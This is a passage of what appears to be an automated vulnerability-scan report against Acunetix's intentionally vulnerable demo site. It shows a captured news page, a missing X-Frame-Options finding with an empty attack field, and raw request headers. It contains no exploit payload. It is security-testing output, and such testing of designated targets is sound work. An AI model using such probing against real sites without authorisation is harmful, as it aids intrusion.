WF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKx7LcVAv6Q/OMBAtCnkuUEArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODAwK/k//ECQK/k//ECQK/k5ObAQK/k5ObAQK/k4e+CgK/k4e+CgK/k7vVAwK/k7vVAwK/k6/oDAK/k6/oDAK/k8OMBAK/k8OMBAK/k/ejDQK/k/ejDQK/k+vGBgK/k+vGBgK/k9+vAwK/k9+vAwK/k/PCDAK/k/PCDAKQut3rDwKQut3rDwKQuvGOBwKQuvGOBwKQuuUlApC65SUCkLqZ+AkCkLqZ+AkCkLqNnwECkLqNnwECkLqhsgoCkLqhsgoCkLrV1gMCkLrV1gMCkLrJ7QwCkLrJ7QwCkLq91QkCkLq91QkCkLrR6QICkLrR6QIC19mQngcC19mQngcC19mENQLX2YQ1AtfZuMgJAtfZuMgJAtfZrO8CAtfZrO8CAtfZwIMKAtfZwIMKAtfZ9KYDAtfZ9KYDAtfZ6P0MAtfZ6P0MAtfZnJAEAtfZnJAEZPSnvrIdg8X/qqjYsEEZ5ETd0S8=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3
Method	POST
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 463 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 Content-Length: 3721 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 3,721 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG